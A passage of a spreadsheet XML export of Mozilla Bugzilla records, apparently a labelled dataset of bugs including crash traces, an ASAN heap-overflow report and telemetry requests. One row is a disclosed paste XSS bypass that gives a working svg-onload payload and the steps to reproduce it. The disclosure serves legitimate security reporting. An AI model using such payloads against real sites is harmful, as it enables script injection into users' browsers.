#0  nsSMILTimeValueSpec::ConvertBetweenTimeContainers (this=0x7fffd8221180, aSrcTime=..., aSrcContainer=0x7fffd84a4dc0) at /build/buildd/firefox-trunk-12.0~a1~hg20120114r84451/build-tree/mozilla/content/smil/nsSMILTimeValueSpec.cpp:546
#1  0x00007ffff42946fa in nsSMILTimeValueSpec::HandleNewInterval (this=0x7fffd8221180, aInterval=..., aSrcContainer=0x7fffd84a4dc0) at /build/buildd/firefox-trunk-12.0~a1~hg20120114r84451/build-tree/mozilla/content/smil/nsSMILTimeValueSpec.cpp:183
#2  0x00007ffff4290ba8 in nsSMILTimedElement::NotifyNewIntervalCallback (aKey=&lt;value optimized out&gt;, aData=&lt;value optimized out&gt;) at /build/buildd/firefox-trunk-12.0~a1~hg20120114r84451/build-tree/mozilla/content/smil/nsSMILTimedElement.cpp:2315
#3  0x00007ffff45c415b in PL_DHashTableEnumerate (table=0x7fffd82119b0, etor=0x7ffff4290b88 &lt;nsTHashtable&lt;nsPtrHashKey&lt;nsSMILTimeValueSpec&gt; &gt;::s_EnumStub(PLDHashTable*, PLDHashEntryHdr*, PRUint32, void*)&gt;, arg=0x7fffffff9a50) at /build/buildd/firefox-trunk-12.0~a1~hg20120114r84451/build-tree/mozilla/obj-x86_64-linux-gnu/xpcom/build/pldhash.cpp:754
#4  0x00007ffff4291c54 in nsTHashtable&lt;nsPtrHashKey&lt;nsSMILTimeValueSpec&gt; &gt;::EnumerateEntries (this=&lt;value optimized out&gt;, enumFunc=&lt;value optimized out&gt;, userArg=&lt;value optimized out&gt;) at ../../dist/include/nsTHashtable.h:241
#5  0x00007ffff4291c9e in nsSMILTimedElement::NotifyNewInterval (this=0x7fffd8211900) at /build/buildd/firefox-trunk-12.0~a1~hg20120114r84451/build-tree/mozilla/content/smil/nsSMILTimedElement.cpp:2203
#6  0x00007ffff42926c5 in nsSMILTimedElement::UpdateCurrentInterval (this=0x7fffd8211900, aForceChangeNotice=&lt;value optimized out&gt;) at /build/buildd/firefox-trunk-12.0~a1~hg20120114r84451/build-tree/mozilla/content/smil/nsSMILTimedElement.cpp:1989
.
.
.</t>
        </is>
      </c>
      <c r="X2382" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2383">
      <c r="A2383" t="n">
        <v>1274498</v>
      </c>
      <c r="B2383" t="inlineStr">
        <is>
          <t>2016-05-19 23:50:33 -0700</t>
        </is>
      </c>
      <c r="C2383" t="inlineStr">
        <is>
          <t>Crash in shutdownhang | mozilla::MFTDecoder::Output()</t>
        </is>
      </c>
      <c r="D2383" t="inlineStr">
        <is>
          <t>2017-07-15 14:14:31 -0700</t>
        </is>
      </c>
      <c r="E2383" t="n">
        <v>1</v>
      </c>
      <c r="F2383" t="n">
        <v>1</v>
      </c>
      <c r="G2383" t="n">
        <v>3</v>
      </c>
      <c r="H2383" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2383" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2383" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K2383" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L2383" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2383" t="inlineStr">
        <is>
          <t>Windows 8</t>
        </is>
      </c>
      <c r="N2383" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2383" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2383" t="inlineStr"/>
      <c r="Q2383" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2383" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2383" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T2383" t="n">
        <v>1</v>
      </c>
      <c r="U2383" t="n">
        <v>0</v>
      </c>
      <c r="V2383" t="n">
        <v>27</v>
      </c>
      <c r="W2383" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-f95ec9f4-b92a-45d0-b946-06a102160515.
=============================================================
Thread 49
- mozilla::WMFMediaDataDecoder::Flush() wait because the processFlush doesn't be handled (mIsFlushing = true)
Thread 50
- mozilla::MFTDecoder::Output(RefPtr&lt;IMFSample&gt;*)
It seems like the MFTDecoder::Output doesn't return the sample, so all tasks are waiting for that.</t>
        </is>
      </c>
      <c r="X2383" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2384">
      <c r="A2384" t="n">
        <v>1444554</v>
      </c>
      <c r="B2384" t="inlineStr">
        <is>
          <t>2018-03-09 15:42:40 -0800</t>
        </is>
      </c>
      <c r="C2384" t="inlineStr">
        <is>
          <t>Telemetry measures for browser error collection</t>
        </is>
      </c>
      <c r="D2384" t="inlineStr">
        <is>
          <t>2018-12-12 07:49:42 -0800</t>
        </is>
      </c>
      <c r="E2384" t="n">
        <v>1</v>
      </c>
      <c r="F2384" t="n">
        <v>1</v>
      </c>
      <c r="G2384" t="n">
        <v>2</v>
      </c>
      <c r="H2384" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2384" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2384" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2384" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2384" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2384" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2384" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2384" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2384" t="inlineStr"/>
      <c r="Q2384" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2384" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2384" t="inlineStr">
        <is>
          <t>Firefox 61</t>
        </is>
      </c>
      <c r="T2384" t="n">
        <v>1</v>
      </c>
      <c r="U2384" t="n">
        <v>0</v>
      </c>
      <c r="V2384" t="n">
        <v>21</v>
      </c>
      <c r="W2384" t="inlineStr">
        <is>
          <t>In order to monitor browser error collection and measure its usefulness, I'd like to add six new scalars to the main ping:
browser.errors.collected_count
    The count of all browser chrome JS errors that were collected locally.
browser.errors.collected_with_stack_count
    The count of browser chrome JS errors that were collected locally and had
    a usable stack trace.
browser.errors.reported_success_count
    The count of all browser chrome JS errors that were reported to the
    remote collection service.
browser.errors.reported_failure_count
    The count of all browser chrome JS errors that we attempted to report to
    the remote collection service, but failed to.
browser.errors.sample_rate
    The sample rate at which collected errors were reported.
browser.errors.collected_count_by_filename
    The count of all browser chrome JS errors that were collected locally,
    keyed by the filename of the file in which the error occurred.</t>
        </is>
      </c>
      <c r="X2384" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2385">
      <c r="A2385" t="n">
        <v>1041512</v>
      </c>
      <c r="B2385" t="inlineStr">
        <is>
          <t>2014-07-21 06:13:28 -0700</t>
        </is>
      </c>
      <c r="C2385" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow in nsTransformedTextRun::SetCapitalization</t>
        </is>
      </c>
      <c r="D2385" t="inlineStr">
        <is>
          <t>2024-05-30 08:35:59 -0700</t>
        </is>
      </c>
      <c r="E2385" t="n">
        <v>1</v>
      </c>
      <c r="F2385" t="n">
        <v>1</v>
      </c>
      <c r="G2385" t="n">
        <v>3</v>
      </c>
      <c r="H2385" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2385" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2385" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K2385" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2385" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2385" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2385" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2385" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2385" t="inlineStr">
        <is>
          <t>[adv-main33+][adv-esr31.2+][b2g-adv-main2.2-]</t>
        </is>
      </c>
      <c r="Q2385" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2385" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2385" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T2385" t="n">
        <v>1</v>
      </c>
      <c r="U2385" t="n">
        <v>0</v>
      </c>
      <c r="V2385" t="n">
        <v>30</v>
      </c>
      <c r="W2385" t="inlineStr">
        <is>
          <t>Created attachment 8459558
Repro-file
Tested on:
OS: Ubuntu 12.04
Firefox: ASAN debug prebuild from https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan-debug/1405918761/
Sometimes the repro-file fails to trigger the crash. If the crash doesn't occur after couple of refresh, restart the browser. Also the crash reproduces a lot more reliably with debug-build than with opt-build. 
ASAN trace:
[7111] ###!!! ASSERTION: Text run should be transformed!: 'mTextRun-&gt;GetFlags() &amp; nsTextFrameUtils::TEXT_IS_TRANSFORMED', file /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsTextFrame.cpp, line 970
=================================================================
==7111==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c0002d1a40 at pc 0x7fdb4338f050 bp 0x7fffaeeeb670 sp 0x7fffaeeeb668
READ of size 8 at 0x60c0002d1a40 thread T0
    #0 0x7fdb4338f04f in nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::Length() const /builds/slave/m-cen-l64-asan-d-0000000000000/build/xpcom/build/../glue/nsTArray.h:323
    #1 0x7fdb433fe598 in nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::IsEmpty() const /builds/slave/m-cen-l64-asan-d-0000000000000/build/obj-firefox/xpcom/base/../../dist/include/nsTArray.h:326
    #2 0x7fdb47483e48 in nsTransformedTextRun::SetCapitalization(unsigned int, unsigned int, bool*, gfxContext*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsTextRunTransformations.cpp:60
    #3 0x7fdb46783ded in nsLineBreaker::AppendText(nsIAtom*, char16_t const*, unsigned int, unsigned int, nsILineBreakSink*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/content/base/src/nsLineBreaker.cpp:291
    #4 0x7fdb46784360 in nsLineBreaker::AppendText(nsIAtom*, unsigned char const*, unsigned int, unsigned int, nsILineBreakSink*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/content/base/src/nsLineBreaker.cpp:327
    #5 0x7fdb4745ddca in BuildTextRunsScanner::SetupBreakSinksForTextRun(gfxTextRun*, void const*, unsigned int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsTextFrame.cpp:2399
    #6 0x7fdb474580b1 in BuildTextRunsScanner::SetupLineBreakerContext(gfxTextRun*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsTextFrame.cpp:2304
    #7 0x7fdb474574ea in BuildTextRunsScanner::FlushFrames(bool, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsTextFrame.cpp:1453
    #8 0x7fdb47460bee in BuildTextRuns(gfxContext*, nsTextFrame*, nsIFrame*, nsLineList_iterator const*, nsTextFrame::TextRunType) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsTextFrame.cpp:1401
    #9 0x7fdb4745f4e8 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, gfxContext*, nsIFrame*, nsLineList_iterator const*, unsigned int*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsTextFrame.cpp:2559
    #10 0x7fdb4747a49e in nsTextFrame::AddInlineMinWidthForFlow(nsRenderingContext*, nsIFrame::InlineMinWidthData*, nsTextFrame::TextRunType) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsTextFrame.cpp:7018
    #11 0x7fdb4747b87f in nsTextFrame::AddInlineMinWidth(nsRenderingContext*, nsIFrame::InlineMinWidthData*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsTextFrame.cpp:7175
    #12 0x7fdb4731cb1d in nsBlockFrame::GetMinWidth(nsRenderingContext*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsBlockFrame.cpp:733
    .
    .
    .
    #60 0x7fdb48107135 in nsAppStartup::Run() /builds/slave/m-cen-l64-asan-d-0000000000000/build/toolkit/components/startup/nsAppStartup.cpp:278
    #61 0x7fdb47f69b3b in XREMain::XRE_mainRun() /builds/slave/m-cen-l64-asan-d-0000000000000/build/toolkit/xre/nsAppRunner.cpp:4013
    #62 0x7fdb47f6af4f in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/toolkit/xre/nsAppRunner.cpp:4084
    #63 0x7fdb47f6b9d2 in XRE_main /builds/slave/m-cen-l64-asan-d-0000000000000/build/toolkit/xre/nsAppRunner.cpp:4298
    #64 0x489fed in do_main(int, char**, nsIFile*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/browser/app/nsBrowserApp.cpp:282
    #65 0x489571 in main /builds/slave/m-cen-l64-asan-d-0000000000000/build/browser/app/nsBrowserApp.cpp:643
    #66 0x7fdb529e276c in ?? ??:0
    #67 0x48925c in _start ??:0
0x60c0002d1a40 is located 0 bytes to the right of 128-byte region [0x60c0002d19c0,0x60c0002d1a40)
allocated by thread T0 here:
    #0 0x471871 in __interceptor_malloc _asan_rtl_
    #1 0x7fdb449893f8 in gfxTextRun::AllocateStorageForTextRun(unsigned long, unsigned int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/gfx/thebes/gfxFont.cpp:6461
    #2 0x7fdb4497fb13 in gfxTextRun::Create(gfxTextRunFactory::Parameters const*, unsigned int, gfxFontGroup*, unsigned int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/gfx/thebes/gfxFont.cpp:6478
    #3 0x7fdb44980f38 in gfxFontGroup::MakeTextRun(unsigned char const*, unsigned int, gfxTextRunFactory::Parameters const*, unsigned int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/gfx/thebes/gfxFont.cpp:5196
    #4 0x7fdb4745d811 in gfxTextRun* MakeTextRun&lt;unsigned char&gt;(unsigned char const*, unsigned int, gfxFontGroup*, gfxTextRunFactory::Parameters const*, unsigned int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsTextFrame.cpp:569
    #5 0x7fdb47459dc5 in BuildTextRunsScanner::BuildTextRunForFrames(void*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsTextFrame.cpp:2145
    #6 0x7fdb47457642 in BuildTextRunsScanner::FlushFrames(bool, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsTextFrame.cpp:1472
    #7 0x7fdb47460bee in BuildTextRuns(gfxContext*, nsTextFrame*, nsIFrame*, nsLineList_iterator const*, nsTextFrame::TextRunType) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsTextFrame.cpp:1401
    #8 0x7fdb4745f4e8 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, gfxContext*, nsIFrame*, nsLineList_iterator const*, unsigned int*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsTextFrame.cpp:2559
    #9 0x7fdb4747a49e in nsTextFrame::AddInlineMinWidthForFlow(nsRenderingContext*, nsIFrame::InlineMinWidthData*, nsTextFrame::TextRunType) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsTextFrame.cpp:7018
    #10 0x7fdb4747b87f in nsTextFrame::AddInlineMinWidth(nsRenderingContext*, nsIFrame::InlineMinWidthData*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsTextFrame.cpp:7175
    #11 0x7fdb4731cb1d in nsBlockFrame::GetMinWidth(nsRenderingContext*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsBlockFrame.cpp:733
    #12 0x7fdb472ab05a in nsLayoutUtils::IntrinsicForContainer(nsRenderingContext*, nsIFrame*, nsLayoutUtils::IntrinsicWidthType, unsigned int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsLayoutUtils.cpp:3732
    #13 0x7fdb4731c958 in nsBlockFrame::GetMinWidth(nsRenderingContext*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsBlockFrame.cpp:713
    #14 0x7fdb472ab05a in nsLayoutUtils::IntrinsicForContainer(nsRenderingContext*, nsIFrame*, nsLayoutUtils::IntrinsicWidthType, unsigned int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsLayoutUtils.cpp:3732
    #15 0x7fdb4731c958 in nsBlockFrame::GetMinWidth(nsRenderingContext*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsBlockFrame.cpp:713
    #16 0x7fdb472ab05a in nsLayoutUtils::IntrinsicForContainer(nsRenderingContext*, nsIFrame*, nsLayoutUtils::IntrinsicWidthType, unsigned int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsLayoutUtils.cpp:3732
    #17 0x7fdb4731c958 in nsBlockFrame::GetMinWidth(nsRenderingContext*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsBlockFrame.cpp:713
    #18 0x7fdb472ab05a in nsLayoutUtils::IntrinsicForContainer(nsRenderingContext*, nsIFrame*, nsLayoutUtils::IntrinsicWidthType, unsigned int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsLayoutUtils.cpp:3732
    #19 0x7fdb4731c958 in nsBlockFrame::GetMinWidth(nsRenderingContext*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsBlockFrame.cpp:713
    #20 0x7fdb472ab05a in nsLayoutUtils::IntrinsicForContainer(nsRenderingContext*, nsIFrame*, nsLayoutUtils::IntrinsicWidthType, unsigned int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsLayoutUtils.cpp:3732
    #21 0x7fdb4731c958 in nsBlockFrame::GetMinWidth(nsRenderingContext*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsBlockFrame.cpp:713
    #22 0x7fdb472ab05a in nsLayoutUtils::IntrinsicForContainer(nsRenderingContext*, nsIFrame*, nsLayoutUtils::IntrinsicWidthType, unsigned int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsLayoutUtils.cpp:3732
    #23 0x7fdb4731c958 in nsBlockFrame::GetMinWidth(nsRenderingContext*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsBlockFrame.cpp:713
    #24 0x7fdb472ab05a in nsLayoutUtils::IntrinsicForContainer(nsRenderingContext*, nsIFrame*, nsLayoutUtils::IntrinsicWidthType, unsigned int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsLayoutUtils.cpp:3732
    #25 0x7fdb4731c958 in nsBlockFrame::GetMinWidth(nsRenderingContext*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsBlockFrame.cpp:713
    #26 0x7fdb4739806e in nsFrame::ShrinkWidthToFit(nsRenderingContext*, int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsFrame.cpp:4240
    #27 0x7fdb47364d14 in nsContainerFrame::ComputeAutoSize(nsRenderingContext*, nsSize, int, nsSize, nsSize, nsSize, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsContainerFrame.cpp:899
    #28 0x7fdb47396adc in nsFrame::ComputeSize(nsRenderingContext*, nsSize, int, nsSize, nsSize, nsSize, unsigned int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsFrame.cpp:4030
    #29 0x7fdb473f7c1d in nsHTMLReflowState::InitAbsoluteConstraints(nsPresContext*, nsHTMLReflowState const*, int, int, nsIAtom*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsHTMLReflowState.cpp:1458
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
  0x0c18800522f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1880052300: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1880052310: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c1880052320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1880052330: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
=&gt;0x0c1880052340: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
  0x0c1880052350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1880052360: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1880052370: 00 00 00 00 00 00 00 04 fa fa fa fa fa fa fa fa
  0x0c1880052380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1880052390: fa fa fa fa fa fa fa fa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7111==ABORTING</t>
        </is>
      </c>
      <c r="X2385" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2386">
      <c r="A2386" t="n">
        <v>1105071</v>
      </c>
      <c r="B2386" t="inlineStr">
        <is>
          <t>2014-11-25 16:53:31 -0800</t>
        </is>
      </c>
      <c r="C2386" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.31 Beta 2</t>
        </is>
      </c>
      <c r="D2386" t="inlineStr">
        <is>
          <t>2014-12-16 20:39:40 -0800</t>
        </is>
      </c>
      <c r="E2386" t="n">
        <v>1</v>
      </c>
      <c r="F2386" t="n">
        <v>1</v>
      </c>
      <c r="G2386" t="n">
        <v>2</v>
      </c>
      <c r="H2386" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2386" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J2386" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K2386" t="inlineStr">
        <is>
          <t>SeaMonkey 2.31 Branch</t>
        </is>
      </c>
      <c r="L2386" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2386" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2386" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2386" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2386" t="inlineStr"/>
      <c r="Q2386" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2386" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2386" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2386" t="n">
        <v>1</v>
      </c>
      <c r="U2386" t="n">
        <v>0</v>
      </c>
      <c r="V2386" t="n">
        <v>4</v>
      </c>
      <c r="W2386" t="inlineStr">
        <is>
          <t>This is a tracking bug for Build and Release of SeaMonkey 2.31 Beta 2
We expect an actual release on Thursday 27th November.</t>
        </is>
      </c>
      <c r="X2386" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2387">
      <c r="A2387" t="n">
        <v>20853</v>
      </c>
      <c r="B2387" t="inlineStr">
        <is>
          <t>1999-12-05 13:21:51 -0800</t>
        </is>
      </c>
      <c r="C2387" t="inlineStr">
        <is>
          <t>[DOGFOOD] "ok" button on New Card dialog throws JS exception</t>
        </is>
      </c>
      <c r="D2387" t="inlineStr">
        <is>
          <t>2024-04-15 01:45:09 -0700</t>
        </is>
      </c>
      <c r="E2387" t="n">
        <v>1</v>
      </c>
      <c r="F2387" t="n">
        <v>1</v>
      </c>
      <c r="G2387" t="n">
        <v>2</v>
      </c>
      <c r="H2387" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2387" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J2387" t="inlineStr">
        <is>
          <t>MailNews: Address Book &amp; Contacts</t>
        </is>
      </c>
      <c r="K2387" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2387" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2387" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2387" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2387" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2387" t="inlineStr"/>
      <c r="Q2387" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2387" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2387" t="inlineStr">
        <is>
          <t>M12</t>
        </is>
      </c>
      <c r="T2387" t="n">
        <v>1</v>
      </c>
      <c r="U2387" t="n">
        <v>0</v>
      </c>
      <c r="V2387" t="n">
        <v>4</v>
      </c>
      <c r="W2387" t="inlineStr">
        <is>
          <t>To reproduce:
1. Open addressbook.
2. Select "Pesonal Address Book"
3. Click "New Card"
4. Fill out new card
5. Click OK
Expected: New card added to addressbook
Actual: Dialog does not dismiss. Following appears in console:
ERROR: JS code at [JS frame :: chrome://addressbook/content/abCardOverlay.js ::
NewCardOKButton :: line 127]
tried to access nonexistent property called
'AddCardToDatabase' on interface of type 'nsIAbCard'.
That interface does however have a property called
'addCardToDatabase'. Did you mean to access that lowercase property?
Please fix the JS code as appropriate.
**************************************************
JavaScript Error: TypeError: cardproperty.AddCardToDatabase is not a function
URL: chrome://addressbook/content/abCardOverlay.js
LineNo: 127
This may be related to 20785.</t>
        </is>
      </c>
      <c r="X2387" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2388">
      <c r="A2388" t="n">
        <v>1646140</v>
      </c>
      <c r="B2388" t="inlineStr">
        <is>
          <t>2020-06-16 12:03:06 -0700</t>
        </is>
      </c>
      <c r="C2388" t="inlineStr">
        <is>
          <t>Bypass of copy+paste leading to paste XSS (using svg onload inside a style tag)</t>
        </is>
      </c>
      <c r="D2388" t="inlineStr">
        <is>
          <t>2024-05-30 10:15:49 -0700</t>
        </is>
      </c>
      <c r="E2388" t="n">
        <v>1</v>
      </c>
      <c r="F2388" t="n">
        <v>1</v>
      </c>
      <c r="G2388" t="n">
        <v>3</v>
      </c>
      <c r="H2388" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2388" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2388" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K2388" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2388" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2388" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2388" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2388" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2388" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main81+][adv-esr78.3+]</t>
        </is>
      </c>
      <c r="Q2388" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2388" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2388" t="inlineStr">
        <is>
          <t>82 Branch</t>
        </is>
      </c>
      <c r="T2388" t="n">
        <v>1</v>
      </c>
      <c r="U2388" t="n">
        <v>0</v>
      </c>
      <c r="V2388" t="n">
        <v>47</v>
      </c>
      <c r="W2388" t="inlineStr">
        <is>
          <t>Created attachment 9157069
20200616_210102.jpg
After reading Michał Bentkowski Work on the Copy+Paste XSS (https://research.securitum.com/the-curious-case-of-copy-paste/) I began to test the differencies in browsers, Firefox and Chrome browser. It seems like I stumbled upon a bypass for the paste XSS, Im using 68.9.0esr (64-bit) but I did message Michal and asked for instructions and he told me to report it here and that I could use his 'playground.html' as part of the PoC
Steps to reproduce:
1. Go to: https://cdn.sekurak.pl/copy-paste/playground.html
2. In the first box (HTML input) use this payload: &lt;svg&gt;&lt;style&gt;&lt;svg onload=alert(document.domain)&gt;
3. Click 'Copy as HTML'
4. Paste it in the 'Paste target'
5. A wild Alert box appears
Just as a good measure (Im a 100% Firefox user) I compared this to Chrome with the exact same payload, and no alert box is present.
Please do let me know if you need anything else! I do feel like this report is a bit lackluster in description, but Im just basing my work on Michal Bentkowski's research.
I'll attach an image as PoC as well :)</t>
        </is>
      </c>
      <c r="X2388" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2389">
      <c r="A2389" t="n">
        <v>757376</v>
      </c>
      <c r="B2389" t="inlineStr">
        <is>
          <t>2012-05-22 03:02:08 -0700</t>
        </is>
      </c>
      <c r="C2389" t="inlineStr">
        <is>
          <t>History navigation error with late location.hash changes</t>
        </is>
      </c>
      <c r="D2389" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:16 -0700</t>
        </is>
      </c>
      <c r="E2389" t="n">
        <v>1</v>
      </c>
      <c r="F2389" t="n">
        <v>1</v>
      </c>
      <c r="G2389" t="n">
